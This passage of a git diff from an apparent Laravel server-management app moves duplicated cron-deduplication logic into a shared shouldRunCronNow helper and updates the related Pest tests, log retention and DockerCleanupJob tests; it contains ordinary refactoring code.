+                    $dedupKey,
+                    $frequency,
+                    $cacheValue ?? '<missing>',
+                    $wouldFire ? 'YES' : 'no',
+                ];
+            }
+        }
+
+        $this->table(
+            ['Server ID', 'Server', 'Dedup Key', 'Frequency', 'Cache Value', 'Would Fire'],
+            $rows
+        );
+        $this->newLine();
+    }
+
+    private function getServers(?string $serverFilter): \Illuminate\Support\Collection
+    {
+        $query = Server::with('settings')->where('ip', '!=', '1.2.3.4');
+
+        if ($serverFilter) {
+            $query->where('id', $serverFilter);
+        }
+
+        if (isCloud()) {
+            $servers = $query->whereRelation('team.subscription', 'stripe_invoice_paid', true)->get();
+            $own = Team::find(0)?->servers()->with('settings')->get() ?? collect();
+
+            return $servers->merge($own);
+        }
+
+        return $query->get();
+    }
+}
diff --git a/app/Jobs/ScheduledJobManager.php b/app/Jobs/ScheduledJobManager.php
index ebcd229ed..71829ea41 100644
--- a/app/Jobs/ScheduledJobManager.php
+++ b/app/Jobs/ScheduledJobManager.php
@@ -6,7 +6,6 @@
 use App\Models\ScheduledTask;
 use App\Models\Server;
 use App\Models\Team;
-use Cron\CronExpression;
 use Illuminate\Bus\Queueable;
 use Illuminate\Contracts\Queue\ShouldQueue;
 use Illuminate\Foundation\Bus\Dispatchable;
@@ -185,7 +184,7 @@ private function processScheduledBackups(): void
                     $frequency = VALID_CRON_STRINGS[$frequency];
                 }
 
-                if ($this->shouldRunNow($frequency, $serverTimezone, "scheduled-backup:{$backup->id}")) {
+                if (shouldRunCronNow($frequency, $serverTimezone, "scheduled-backup:{$backup->id}", $this->executionTime)) {
                     DatabaseBackupJob::dispatch($backup);
                     $this->dispatchedCount++;
                     Log::channel('scheduled')->info('Backup dispatched', [
@@ -239,7 +238,7 @@ private function processScheduledTasks(): void
                     $frequency = VALID_CRON_STRINGS[$frequency];
                 }
 
-                if (! $this->shouldRunNow($frequency, $serverTimezone, "scheduled-task:{$task->id}")) {
+                if (! shouldRunCronNow($frequency, $serverTimezone, "scheduled-task:{$task->id}", $this->executionTime)) {
                     continue;
                 }
 
@@ -336,51 +335,6 @@ private function getTaskRuntimeSkipReason(ScheduledTask $task): ?string
         return null;
     }
 
-    /**
-     * Determine if a cron schedule should run now.
-     *
-     * When a dedupKey is provided, uses getPreviousRunDate() + last-dispatch tracking
-     * instead of isDue(). This is resilient to queue delays — even if the job is delayed
-     * by minutes, it still catches the missed cron window. Without dedupKey, falls back
-     * to simple isDue() check.
-     */
-    private function shouldRunNow(string $frequency, string $timezone, ?string $dedupKey = null): bool
-    {
-        $cron = new CronExpression($frequency);
-        $baseTime = $this->executionTime ?? Carbon::now();
-        $executionTime = $baseTime->copy()->setTimezone($timezone);
-
-        // No dedup key → simple isDue check
-        if ($dedupKey === null) {
-            return $cron->isDue($executionTime);
-        }
-
-        // Get the most recent time this cron was due (including current minute)
-        $previousDue = Carbon::instance($cron->getPreviousRunDate($executionTime, allowCurrentDate: true));
-
-        $lastDispatched = Cache::get($dedupKey);
-
-        if ($lastDispatched === null) {
-            // First run after restart or cache loss: only fire if actually due right now.
-            // Seed the cache so subsequent runs can use tolerance/catch-up logic.
-            $isDue = $cron->isDue($executionTime);
-            if ($isDue) {
-                Cache::put($dedupKey, $executionTime->toIso8601String(), 86400);
-            }
-
-            return $isDue;
-        }
-
-        // Subsequent runs: fire if there's been a due time since last dispatch
-        if ($previousDue->gt(Carbon::parse($lastDispatched))) {
-            Cache::put($dedupKey, $executionTime->toIso8601String(), 86400);
-
-            return true;
-        }
-
-        return false;
-    }
-
     private function processDockerCleanups(): void
     {
         // Get all servers that need cleanup checks
@@ -411,7 +365,7 @@ private function processDockerCleanups(): void
                 }
 
                 // Use the frozen execution time for consistent evaluation
-                if ($this->shouldRunNow($frequency, $serverTimezone, "docker-cleanup:{$server->id}")) {
+                if (shouldRunCronNow($frequency, $serverTimezone, "docker-cleanup:{$server->id}", $this->executionTime)) {
                     DockerCleanupJob::dispatch(
                         $server,
                         false,
diff --git a/app/Jobs/ServerManagerJob.php b/app/Jobs/ServerManagerJob.php
index d56ff0a8c..3f748f0ca 100644
--- a/app/Jobs/ServerManagerJob.php
+++ b/app/Jobs/ServerManagerJob.php
@@ -5,7 +5,6 @@
 use App\Models\InstanceSettings;
 use App\Models\Server;
 use App\Models\Team;
-use Cron\CronExpression;
 use Illuminate\Bus\Queueable;
 use Illuminate\Contracts\Queue\ShouldBeEncrypted;
 use Illuminate\Contracts\Queue\ShouldQueue;
@@ -14,7 +13,6 @@
 use Illuminate\Queue\SerializesModels;
 use Illuminate\Support\Carbon;
 use Illuminate\Support\Collection;
-use Illuminate\Support\Facades\Cache;
 use Illuminate\Support\Facades\Log;
 
 class ServerManagerJob implements ShouldBeEncrypted, ShouldQueue
@@ -81,7 +79,7 @@ private function getServers(): Collection
     private function dispatchConnectionChecks(Collection $servers): void
     {
 
-        if ($this->shouldRunNow($this->checkFrequency, dedupKey: 'server-connection-checks')) {
+        if (shouldRunCronNow($this->checkFrequency, $this->instanceTimezone, 'server-connection-checks', $this->executionTime)) {
             $servers->each(function (Server $server) {
                 try {
                     // Skip SSH connection check if Sentinel is healthy — its heartbeat already proves connectivity
@@ -130,13 +128,13 @@ private function processServerTasks(Server $server): void
 
         if ($sentinelOutOfSync) {
             // Dispatch ServerCheckJob if Sentinel is out of sync
-            if ($this->shouldRunNow($this->checkFrequency, $serverTimezone, "server-check:{$server->id}")) {
+            if (shouldRunCronNow($this->checkFrequency, $serverTimezone, "server-check:{$server->id}", $this->executionTime)) {
                 ServerCheckJob::dispatch($server);
             }
         }
 
         $isSentinelEnabled = $server->isSentinelEnabled();
-        $shouldRestartSentinel = $isSentinelEnabled && $this->shouldRunNow('0 0 * * *', $serverTimezone, "sentinel-restart:{$server->id}");
+        $shouldRestartSentinel = $isSentinelEnabled && shouldRunCronNow('0 0 * * *', $serverTimezone, "sentinel-restart:{$server->id}", $this->executionTime);
         // Dispatch Sentinel restart if due (daily for Sentinel-enabled servers)
 
         if ($shouldRestartSentinel) {
@@ -150,7 +148,7 @@ private function processServerTasks(Server $server): void
             if (isset(VALID_CRON_STRINGS[$serverDiskUsageCheckFrequency])) {
                 $serverDiskUsageCheckFrequency = VALID_CRON_STRINGS[$serverDiskUsageCheckFrequency];
             }
-            $shouldRunStorageCheck = $this->shouldRunNow($serverDiskUsageCheckFrequency, $serverTimezone, "server-storage-check:{$server->id}");
+            $shouldRunStorageCheck = shouldRunCronNow($serverDiskUsageCheckFrequency, $serverTimezone, "server-storage-check:{$server->id}", $this->executionTime);
 
             if ($shouldRunStorageCheck) {
                 ServerStorageCheckJob::dispatch($server);
@@ -158,7 +156,7 @@ private function processServerTasks(Server $server): void
         }
 
         // Dispatch ServerPatchCheckJob if due (weekly)
-        $shouldRunPatchCheck = $this->shouldRunNow('0 0 * * 0', $serverTimezone, "server-patch-check:{$server->id}");
+        $shouldRunPatchCheck = shouldRunCronNow('0 0 * * 0', $serverTimezone, "server-patch-check:{$server->id}", $this->executionTime);
 
         if ($shouldRunPatchCheck) { // Weekly on Sunday at midnight
             ServerPatchCheckJob::dispatch($server);
@@ -167,45 +165,4 @@ private function processServerTasks(Server $server): void
         // Note: CheckAndStartSentinelJob is only dispatched daily (line above) for version updates.
         // Crash recovery is handled by sentinelOutOfSync → ServerCheckJob → CheckAndStartSentinelJob.
     }
-
-    /**
-     * Determine if a cron schedule should run now.
-     *
-     * When a dedupKey is provided, uses getPreviousRunDate() + last-dispatch tracking
-     * instead of isDue(). This is resilient to queue delays — even if the job is delayed
-     * by minutes, it still catches the missed cron window.
-     */
-    private function shouldRunNow(string $frequency, ?string $timezone = null, ?string $dedupKey = null): bool
-    {
-        $cron = new CronExpression($frequency);
-
-        // Use the frozen execution time, not the current time
-        $baseTime = $this->executionTime ?? Carbon::now();
-        $executionTime = $baseTime->copy()->setTimezone($timezone ?? config('app.timezone'));
-
-        if ($dedupKey === null) {
-            return $cron->isDue($executionTime);
-        }
-
-        $previousDue = Carbon::instance($cron->getPreviousRunDate($executionTime, allowCurrentDate: true));
-
-        $lastDispatched = Cache::get($dedupKey);
-
-        if ($lastDispatched === null) {
-            $isDue = $cron->isDue($executionTime);
-            if ($isDue) {
-                Cache::put($dedupKey, $executionTime->toIso8601String(), 86400);
-            }
-
-            return $isDue;
-        }
-
-        if ($previousDue->gt(Carbon::parse($lastDispatched))) {
-            Cache::put($dedupKey, $executionTime->toIso8601String(), 86400);
-
-            return true;
-        }
-
-        return false;
-    }
 }
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index e81d2a467..26aa21a7b 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -466,6 +466,36 @@ function validate_cron_expression($expression_to_validate): bool
     return $isValid;
 }
 
+/**
+ * Determine if a cron schedule should run now, with deduplication.
+ *
+ * Uses getPreviousRunDate() + last-dispatch tracking to be resilient to queue delays.
+ * Even if the job runs minutes late, it still catches the missed cron window.
+ * Without a dedupKey, falls back to a simple isDue() check.
+ */
+function shouldRunCronNow(string $frequency, string $timezone, ?string $dedupKey = null, ?\Illuminate\Support\Carbon $executionTime = null): bool
+{
+    $cron = new \Cron\CronExpression($frequency);
+    $executionTime = ($executionTime ?? \Illuminate\Support\Carbon::now())->copy()->setTimezone($timezone);
+
+    if ($dedupKey === null) {
+        return $cron->isDue($executionTime);
+    }
+
+    $previousDue = \Illuminate\Support\Carbon::instance($cron->getPreviousRunDate($executionTime, allowCurrentDate: true));
+    $lastDispatched = Cache::get($dedupKey);
+
+    $shouldFire = $lastDispatched === null
+        ? $cron->isDue($executionTime)
+        : $previousDue->gt(\Illuminate\Support\Carbon::parse($lastDispatched));
+
+    // Always write: seeds on first miss, refreshes on dispatch.
+    // 30-day static TTL covers all intervals; orphan keys self-clean.
+    Cache::put($dedupKey, ($shouldFire ? $executionTime : $previousDue)->toIso8601String(), 2592000);
+
+    return $shouldFire;
+}
+
 function validate_timezone(string $timezone): bool
 {
     return in_array($timezone, timezone_identifiers_list());
diff --git a/config/logging.php b/config/logging.php
index 1a75978f3..1dbb1135f 100644
--- a/config/logging.php
+++ b/config/logging.php
@@ -123,7 +123,7 @@
             'driver' => 'daily',
             'path' => storage_path('logs/scheduled.log'),
             'level' => 'debug',
-            'days' => 1,
+            'days' => 7,
         ],
 
         'scheduled-errors' => [
diff --git a/tests/Feature/DockerCleanupJobTest.php b/tests/Feature/DockerCleanupJobTest.php
new file mode 100644
index 000000000..446260e22
--- /dev/null
+++ b/tests/Feature/DockerCleanupJobTest.php
@@ -0,0 +1,50 @@
+<?php
+
+use App\Jobs\DockerCleanupJob;
+use App\Models\DockerCleanupExecution;
+use App\Models\Server;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+it('creates a failed execution record when server is not functional', function () {
+    $user = User::factory()->create();
+    $team = $user->teams()->first();
+    $server = Server::factory()->create(['team_id' => $team->id]);
+
+    // Make server not functional by setting is_reachable to false
+    $server->settings->update(['is_reachable' => false]);
+
+    $job = new DockerCleanupJob($server);
+    $job->handle();
+
+    $execution = DockerCleanupExecution::where('server_id', $server->id)->first();
+
+    expect($execution)->not->toBeNull()
+        ->and($execution->status)->toBe('failed')
+        ->and($execution->message)->toContain('not functional')
+        ->and($execution->finished_at)->not->toBeNull();
+});
+
+it('creates a failed execution record when server is force disabled', function () {
+    $user = User::factory()->create();
+    $team = $user->teams()->first();
+    $server = Server::factory()->create(['team_id' => $team->id]);
+
+    // Make server not functional by force disabling
+    $server->settings->update([
+        'is_reachable' => true,
+        'is_usable' => true,
+        'force_disabled' => true,
+    ]);
+
+    $job = new DockerCleanupJob($server);
+    $job->handle();
+
+    $execution = DockerCleanupExecution::where('server_id', $server->id)->first();
+
+    expect($execution)->not->toBeNull()
+        ->and($execution->status)->toBe('failed')
+        ->and($execution->message)->toContain('not functional');
+});
diff --git a/tests/Feature/ScheduledJobManagerShouldRunNowTest.php b/tests/Feature/ScheduledJobManagerShouldRunNowTest.php
index e445e9908..84db743fa 100644
--- a/tests/Feature/ScheduledJobManagerShouldRunNowTest.php
+++ b/tests/Feature/ScheduledJobManagerShouldRunNowTest.php
@@ -1,271 +1,168 @@
 <?php
 
-use App\Jobs\ScheduledJobManager;
 use Illuminate\Support\Carbon;
 use Illuminate\Support\Facades\Cache;
 
 beforeEach(function () {
-    // Clear any dedup keys
     Cache::flush();
 });
 
 it('dispatches backup when job runs on time at the cron minute', function () {
-    // Freeze time at exactly 02:00 — daily cron "0 2 * * *" is due
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 0, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-
-    // Use reflection to test shouldRunNow
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    $result = $method->invoke($job, '0 2 * * *', 'UTC', 'test-backup:1');
+    $result = shouldRunCronNow('0 2 * * *', 'UTC', 'test-backup:1');
 
     expect($result)->toBeTrue();
 });
 
 it('catches delayed job when cache has a baseline from previous run', function () {
-    // Simulate a previous dispatch yesterday at 02:00
     Cache::put('test-backup:1', Carbon::create(2026, 2, 27, 2, 0, 0, 'UTC')->toIso8601String(), 86400);
 
-    // Freeze time at 02:07 — job was delayed 7 minutes past today's 02:00 cron
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 7, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
     // isDue() would return false at 02:07, but getPreviousRunDate() = 02:00 today
     // lastDispatched = 02:00 yesterday → 02:00 today > yesterday → fires
-    $result = $method->invoke($job, '0 2 * * *', 'UTC', 'test-backup:1');
+    $result = shouldRunCronNow('0 2 * * *', 'UTC', 'test-backup:1');
 
     expect($result)->toBeTrue();
 });
 
 it('does not double-dispatch on subsequent runs within same cron window', function () {
-    // First run at 02:00 — dispatches and sets cache
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 0, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    $first = $method->invoke($job, '0 2 * * *', 'UTC', 'test-backup:2');
+    $first = shouldRunCronNow('0 2 * * *', 'UTC', 'test-backup:2');
     expect($first)->toBeTrue();
 
     // Second run at 02:01 — should NOT dispatch (previousDue=02:00, lastDispatched=02:00)
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 1, 0, 'UTC'));
-    $executionTimeProp->setValue($job, Carbon::now());
 
-    $second = $method->invoke($job, '0 2 * * *', 'UTC', 'test-backup:2');
+    $second = shouldRunCronNow('0 2 * * *', 'UTC', 'test-backup:2');
     expect($second)->toBeFalse();
 });
 
 it('fires every_minute cron correctly on consecutive minutes', function () {
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
     // Minute 1
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 0, 0, 'UTC'));
-    $executionTimeProp->setValue($job, Carbon::now());
-    $result1 = $method->invoke($job, '* * * * *', 'UTC', 'test-backup:3');
-    expect($result1)->toBeTrue();
+    expect(shouldRunCronNow('* * * * *', 'UTC', 'test-backup:3'))->toBeTrue();
 
     // Minute 2
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 1, 0, 'UTC'));
-    $executionTimeProp->setValue($job, Carbon::now());
-    $result2 = $method->invoke($job, '* * * * *', 'UTC', 'test-backup:3');
-    expect($result2)->toBeTrue();
+    expect(shouldRunCronNow('* * * * *', 'UTC', 'test-backup:3'))->toBeTrue();
 
     // Minute 3
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 2, 0, 'UTC'));
-    $executionTimeProp->setValue($job, Carbon::now());
-    $result3 = $method->invoke($job, '* * * * *', 'UTC', 'test-backup:3');
-    expect($result3)->toBeTrue();
+    expect(shouldRunCronNow('* * * * *', 'UTC', 'test-backup:3'))->toBeTrue();
 });
 
 it('does not fire non-due jobs on restart when cache is empty', function () {
     // Time is 10:00, cron is daily at 02:00 — NOT due right now
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 0, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    // Cache is empty (fresh restart) — should NOT fire daily backup at 10:00
-    $result = $method->invoke($job, '0 2 * * *', 'UTC', 'test-backup:4');
+    $result = shouldRunCronNow('0 2 * * *', 'UTC', 'test-backup:4');
     expect($result)->toBeFalse();
 });
 
 it('fires due jobs on restart when cache is empty', function () {
-    // Time is exactly 02:00, cron is daily at 02:00 — IS due right now
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 0, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    // Cache is empty (fresh restart) — but cron IS due → should fire
-    $result = $method->invoke($job, '0 2 * * *', 'UTC', 'test-backup:4b');
+    $result = shouldRunCronNow('0 2 * * *', 'UTC', 'test-backup:4b');
     expect($result)->toBeTrue();
 });
 
 it('does not dispatch when cron is not due and was not recently due', function () {
-    // Time is 10:00, cron is daily at 02:00 — last due was 8 hours ago
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 0, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    // previousDue = 02:00, but lastDispatched was set at 02:00 (simulate)
     Cache::put('test-backup:5', Carbon::create(2026, 2, 28, 2, 0, 0, 'UTC')->toIso8601String(), 86400);
 
-    $result = $method->invoke($job, '0 2 * * *', 'UTC', 'test-backup:5');
+    $result = shouldRunCronNow('0 2 * * *', 'UTC', 'test-backup:5');
     expect($result)->toBeFalse();
 });
 
 it('falls back to isDue when no dedup key is provided', function () {
-    // Time is exactly 02:00, cron is "0 2 * * *" — should be due
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 0, 0, 'UTC'));
+    expect(shouldRunCronNow('0 2 * * *', 'UTC'))->toBeTrue();
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    // No dedup key → simple isDue check
-    $result = $method->invoke($job, '0 2 * * *', 'UTC');
-    expect($result)->toBeTrue();
-
-    // At 02:01 without dedup key → isDue returns false
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 1, 0, 'UTC'));
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $result2 = $method->invoke($job, '0 2 * * *', 'UTC');
-    expect($result2)->toBeFalse();
+    expect(shouldRunCronNow('0 2 * * *', 'UTC'))->toBeFalse();
 });
 
 it('catches delayed docker cleanup when job runs past the cron minute', function () {
-    // Simulate a previous dispatch at :10
     Cache::put('docker-cleanup:42', Carbon::create(2026, 2, 28, 10, 10, 0, 'UTC')->toIso8601String(), 86400);
 
-    // Freeze time at :22 — job was delayed 2 minutes past the :20 cron window
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 22, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
     // isDue() would return false at :22, but getPreviousRunDate() = :20
     // lastDispatched = :10 → :20 > :10 → fires
-    $result = $method->invoke($job, '*/10 * * * *', 'UTC', 'docker-cleanup:42');
+    $result = shouldRunCronNow('*/10 * * * *', 'UTC', 'docker-cleanup:42');
 
     expect($result)->toBeTrue();
 });
 
 it('does not double-dispatch docker cleanup within same cron window', function () {
-    // First dispatch at :10
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 10, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    $first = $method->invoke($job, '*/10 * * * *', 'UTC', 'docker-cleanup:99');
+    $first = shouldRunCronNow('*/10 * * * *', 'UTC', 'docker-cleanup:99');
     expect($first)->toBeTrue();
 
-    // Second run at :11 — should NOT dispatch (previousDue=:10, lastDispatched=:10)
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 11, 0, 'UTC'));
-    $executionTimeProp->setValue($job, Carbon::now());
 
-    $second = $method->invoke($job, '*/10 * * * *', 'UTC', 'docker-cleanup:99');
+    $second = shouldRunCronNow('*/10 * * * *', 'UTC', 'docker-cleanup:99');
     expect($second)->toBeFalse();
 });
 
+it('seeds cache with previousDue when not due on first run', function () {
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 0, 0, 'UTC'));
+
+    $result = shouldRunCronNow('0 2 * * *', 'UTC', 'test-seed:1');
+    expect($result)->toBeFalse();
+
+    // Verify cache was seeded with previousDue (02:00 today)
+    $cached = Cache::get('test-seed:1');
+    expect($cached)->not->toBeNull();
+    expect(Carbon::parse($cached)->format('H:i'))->toBe('02:00');
+});
+
+it('catches next occurrence after cache was seeded on non-due first run', function () {
+    // Step 1: 10:00 — not due, but seeds cache with previousDue (02:00 today)
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 10, 0, 0, 'UTC'));
+    expect(shouldRunCronNow('0 2 * * *', 'UTC', 'test-seed:2'))->toBeFalse();
+
+    // Step 2: Next day at 02:03 — delayed 3 minutes past cron.
+    // previousDue = 02:00 Mar 1, lastDispatched = 02:00 Feb 28 → fires
+    Carbon::setTestNow(Carbon::create(2026, 3, 1, 2, 3, 0, 'UTC'));
+    expect(shouldRunCronNow('0 2 * * *', 'UTC', 'test-seed:2'))->toBeTrue();
+});
+
+it('cache survives 29 days with static 30-day TTL', function () {
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 2, 0, 0, 'UTC'));
+
+    shouldRunCronNow('0 2 * * *', 'UTC', 'test-ttl:static');
+    expect(Cache::get('test-ttl:static'))->not->toBeNull();
+
+    // 29 days later — cache (30-day TTL) should still exist
+    Carbon::setTestNow(Carbon::create(2026, 3, 29, 0, 0, 0, 'UTC'));
+    expect(Cache::get('test-ttl:static'))->not->toBeNull();
+});
+
 it('respects server timezone for cron evaluation', function () {
     // UTC time is 22:00 Feb 28, which is 06:00 Mar 1 in Asia/Singapore (+8)
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 22, 0, 0, 'UTC'));
 
-    $job = new ScheduledJobManager;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    // Simulate that today's 06:00 UTC run was already dispatched (at 06:00 UTC)
     Cache::put('test-backup:7', Carbon::create(2026, 2, 28, 6, 0, 0, 'UTC')->toIso8601String(), 86400);
 
-    // Cron "0 6 * * *" in Asia/Singapore: local time is 06:00 Mar 1 → previousDue = 06:00 Mar 1 SGT
-    // That's a NEW cron window (Mar 1) that hasn't been dispatched → should fire
-    $resultSingapore = $method->invoke($job, '0 6 * * *', 'Asia/Singapore', 'test-backup:6');
-    expect($resultSingapore)->toBeTrue();
+    // Cron "0 6 * * *" in Asia/Singapore: local time is 06:00 Mar 1 → new window → should fire
+    expect(shouldRunCronNow('0 6 * * *', 'Asia/Singapore', 'test-backup:6'))->toBeTrue();
 
-    // Cron "0 6 * * *" in UTC: previousDue = 06:00 Feb 28 UTC, already dispatched at 06:00 → should NOT fire
-    $resultUtc = $method->invoke($job, '0 6 * * *', 'UTC', 'test-backup:7');
-    expect($resultUtc)->toBeFalse();
+    // Cron "0 6 * * *" in UTC: previousDue = 06:00 Feb 28, already dispatched → should NOT fire
+    expect(shouldRunCronNow('0 6 * * *', 'UTC', 'test-backup:7'))->toBeFalse();
+});
+
+it('passes explicit execution time instead of using Carbon::now()', function () {
+    // Real "now" is irrelevant — we pass an explicit execution time
+    Carbon::setTestNow(Carbon::create(2026, 2, 28, 15, 0, 0, 'UTC'));
+
+    $executionTime = Carbon::create(2026, 2, 28, 2, 0, 0, 'UTC');
+    $result = shouldRunCronNow('0 2 * * *', 'UTC', 'test-exec-time:1', $executionTime);
+
+    expect($result)->toBeTrue();
 });
diff --git a/tests/Feature/ServerManagerJobShouldRunNowTest.php b/tests/Feature/ServerManagerJobShouldRunNowTest.php
index 518f05c9c..2743a8650 100644
--- a/tests/Feature/ServerManagerJobShouldRunNowTest.php
+++ b/tests/Feature/ServerManagerJobShouldRunNowTest.php
@@ -1,6 +1,5 @@
 <?php
 
-use App\Jobs\ServerManagerJob;
 use Illuminate\Support\Carbon;
 use Illuminate\Support\Facades\Cache;
 
@@ -9,94 +8,81 @@
 });
 
 it('catches delayed sentinel restart when job runs past midnight', function () {
-    // Simulate previous dispatch yesterday at midnight
     Cache::put('sentinel-restart:1', Carbon::create(2026, 2, 27, 0, 0, 0, 'UTC')->toIso8601String(), 86400);
 
     // Job runs 3 minutes late at 00:03
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 0, 3, 0, 'UTC'));
 
-    $job = new ServerManagerJob;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
     // isDue() would return false at 00:03, but getPreviousRunDate() = 00:00 today
     // lastDispatched = yesterday 00:00 → today 00:00 > yesterday → fires
-    $result = $method->invoke($job, '0 0 * * *', 'UTC', 'sentinel-restart:1');
+    $result = shouldRunCronNow('0 0 * * *', 'UTC', 'sentinel-restart:1');
 
     expect($result)->toBeTrue();
 });
 
 it('catches delayed weekly patch check when job runs past the cron minute', function () {
-    // Simulate previous dispatch last Sunday at midnight
     Cache::put('server-patch-check:1', Carbon::create(2026, 2, 22, 0, 0, 0, 'UTC')->toIso8601String(), 86400);
 
-    // This Sunday at 00:02 — job was delayed 2 minutes
-    // 2026-03-01 is a Sunday
+    // This Sunday at 00:02 — job was delayed 2 minutes (2026-03-01 is a Sunday)
     Carbon::setTestNow(Carbon::create(2026, 3, 1, 0, 2, 0, 'UTC'));
 
-    $job = new ServerManagerJob;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    $result = $method->invoke($job, '0 0 * * 0', 'UTC', 'server-patch-check:1');
+    $result = shouldRunCronNow('0 0 * * 0', 'UTC', 'server-patch-check:1');
 
     expect($result)->toBeTrue();
 });
 
 it('catches delayed storage check when job runs past the cron minute', function () {
-    // Simulate previous dispatch yesterday at 23:00
     Cache::put('server-storage-check:5', Carbon::create(2026, 2, 27, 23, 0, 0, 'UTC')->toIso8601String(), 86400);
 
-    // Today at 23:04 — job was delayed 4 minutes
     Carbon::setTestNow(Carbon::create(2026, 2, 28, 23, 4, 0, 'UTC'));
 
-    $job = new ServerManagerJob;
-    $reflection = new ReflectionClass($job);
-
-    $executionTimeProp = $reflection->getProperty('executionTime');
-    $executionTimeProp->setAccessible(true);
-    $executionTimeProp->setValue($job, Carbon::now());
-
-    $method = $reflection->getMethod('shouldRunNow');
-    $method->setAccessible(true);
-
-    $result = $method->invoke($job, '0 23 * * *', 'UTC', 'server-storage-check:5');
+    $result = shouldRunCronNow('0 23 * * *', 'UTC', 'server-storage-check:5');
 
     expect($result)->toBeTrue();
 });
 
+it('seeds cache on non-due first run so weekly catch-up works', function () {
+    // Wednesday at 10:00 — weekly cron (Sunday 00:00) is not due
+    Carbon::setTestNow(Carbon::create(2026, 2, 25, 10, 0, 0, 'UTC'));
+
+    $result = shouldRunCronNow('0 0 * * 0', 'UTC', 'server-patch-check:seed-test');
+    expect($result)->toBeFalse();
+
+    // Verify cache was seeded
